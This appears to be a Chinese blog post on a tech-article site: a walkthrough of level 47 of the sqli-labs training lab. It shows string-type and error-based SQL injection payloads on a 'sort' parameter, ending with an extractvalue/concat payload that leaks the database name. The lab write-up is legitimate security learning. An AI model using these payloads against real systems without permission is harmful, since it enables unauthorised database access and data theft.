热门标签
热门文章
- 1Ai配音专家 免费配置教程(适用于mac和windows系统)
- 2AJAX概念和axios使用、URL、请求方法和数据提交、HTTP协议、接口、form-serialize插件
- 3小微企业如何做数字化转型?应该从哪一步开始?_以公司为例探究中小微企业如何应对数字化业务转型
- 4Postman中参数填写方式
- 5Android Studio Logcat升级和还原旧版_android studio giraffe设置旧的logcat
- 6初学STM32F205的库包搭建工程_stm32f205 库文件
- 7神奇的Compose - 性能监控篇_freecompilerargs
- 8使用UniApp实现表格组件_uniapp 表格组件
- 9已解决org.apache.zookeeper.KeeperException.BadVersionException异常的正确解冲方法,亲测有效!!!
- 10removebg抠图小工具
当前位置: article > 正文
sqllab第四十七关通关笔记
作者:Gausst松鼠会 | 2024-03-19 09:52:41
赞
踩
sqllab第四十七关通关笔记
知识点:
- 错误注入
- 字符型注入
- order by 位置注入
- 报错注入
- 时间盲注
通过测试发现是一个字符型注入
构造payload:sort=2' 报错了
构造payload:sort=2'' 不提示报错了
说明这里存在字符型注入
尝试进行单引号绕过
构造payload:sort=2'and 1='1
这里其实and后面的没起到作用,整体也没作用感觉,内容顺序没变过
直接进行错误注入
构造payload:sort=2'and extractvalue(1,concat(0x7e,database(),0x7e))='1
成功获取到了数据库名
10
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/Gausst松鼠会/article/detail/267473
推荐阅读
相关标签
